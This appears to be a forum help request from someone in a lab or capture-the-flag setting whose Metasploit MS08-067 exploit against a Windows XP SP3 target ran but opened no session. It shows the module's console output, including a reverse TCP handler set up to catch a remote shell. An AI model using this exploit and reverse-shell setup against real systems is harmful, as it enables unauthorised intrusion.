so I run the nmap and get the whole bunch of info from there and after that I find the correct exploit MS08-067. TO be sure I set up RHOSTS , target and payload.
I get stuck at :
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
 Started reverse TCP handler on 10.0.2.15:4444
 10.10.10.4:445 - Automatically detecting the target...
 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
 10.10.10.4:445 - Attempting to trigger the vulnerability...
 Exploit completed, but no session was created.
any idea why the session is not created as it should ?